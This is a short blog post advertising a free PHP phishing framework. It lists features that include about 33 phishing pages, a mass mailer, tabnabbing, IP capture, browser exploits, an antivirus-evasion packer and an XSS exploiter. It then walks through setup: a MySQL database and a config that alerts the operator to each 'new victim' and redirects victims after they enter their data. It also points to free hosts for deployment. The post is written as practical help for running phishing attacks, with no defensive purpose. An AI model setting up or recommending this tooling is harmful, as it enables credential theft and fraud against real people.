Description
It’s a free and open source phishing framework (SCRIPT)that helps the social-engineers in phishing attacks. and it’s includes alot of phishing pages and more stuff that helps you in phishing.the application is coded in PHP,XHTML,CSS,and Javascript.
Features
- About 33 phishing page.
- Php mailer let you send a message to a several emails.
- Phishing by tabnabbing.
- Ip captue.
- Several browsers exploits. (untested)
- Packer lets you to crypt exploits to bypass antiviruses.
- Uploader to upload your files.
- XSS simple exploiter.
- Search to let you search in the application's database for a victim.
- iframes.
here is tutorial how to install it
you can use free hosting sites like 0fees.net, zymic.com etc
you can use free hosting sites like 0fees.net, zymic.com etc
Requirements:
- PHP interpreter.
- MySQL Database.
- Text Editor.
- Browser.
First we will need to create a MySQL database.
$ mysql -u USERNAME -p PASSWORD
mysql> CREATE DATABASE ninja_pf;
Now we need to edit the configuration file
$mysql_hostname = "localhost"; // MYSQL SERVER (DEFAULT:localhost)
$mysql_username = "USERNAME"; // << MYSQL USERNAME
$mysql_password = "PASSWORD"; // << MYSQL USERNAME's PASSWORD
$mysql_database = "ninja_pf"; // << MYSQL DATABASE NAME
$email_notification = TRUE; // << IF YOU HAVE A NEW VICTIM THE APPLICATION WILL SEND YOU A MESSAGE
$redirect_to = "http://google.com"; // << REDIRECT TO, AFTER THE VICTIM INSERTED HIS/HER DATA
now you can go to the administration page (http://yoursite.com/[PATH]/admin
0 comments:
Post a Comment